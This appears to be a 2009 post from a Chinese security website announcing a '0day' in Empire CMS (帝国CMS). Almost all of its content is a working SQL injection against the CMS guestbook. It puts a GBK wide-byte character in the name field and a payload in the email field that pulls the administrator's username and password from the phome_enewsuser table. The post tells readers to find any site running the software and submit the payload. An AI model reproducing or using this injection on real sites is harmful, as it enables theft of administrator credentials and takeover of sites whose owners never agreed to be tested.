频道栏目
首页 > 安全 > 网站安全 > 正文

帝国CMS 0day

2009-06-13 01:00:12           
收藏   我要投稿

普瑞斯特

深灰丢出来的0day.
找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:縗
联系邮箱处写:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from
phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码

相关TAG标签 帝国
上一篇:动网论坛三个页面过滤不严导致跨站漏洞
下一篇:Z-BLOG XSS Vulnerabilities
相关文章
图文推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站